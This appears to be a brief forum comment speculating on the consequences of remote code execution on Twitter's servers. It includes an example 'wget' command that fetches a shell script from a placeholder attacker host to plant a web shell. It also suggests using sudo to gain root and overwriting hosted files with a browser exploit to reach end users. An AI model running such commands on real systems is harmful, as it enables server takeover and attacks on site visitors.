Remote code execution e.g. he can also execute 'wget http://bad.php.script/shell.php' for planting shell or 'sudo <command>' for priviledge execution (up to root). So pretty much everything you can do on their Twitter servers.
Another "fun" thing to do is if the hosted data is just sitting there, wget a browser exploit file on top of it.
This is probably not a serious concern for a place as huge as twitter because they're going to CDN static content separately from dynamic content, but would be really exciting for "I got me one server for my whole startup" types. Maybe you could bypass existing systems to serve up malicious code to end users anyway.
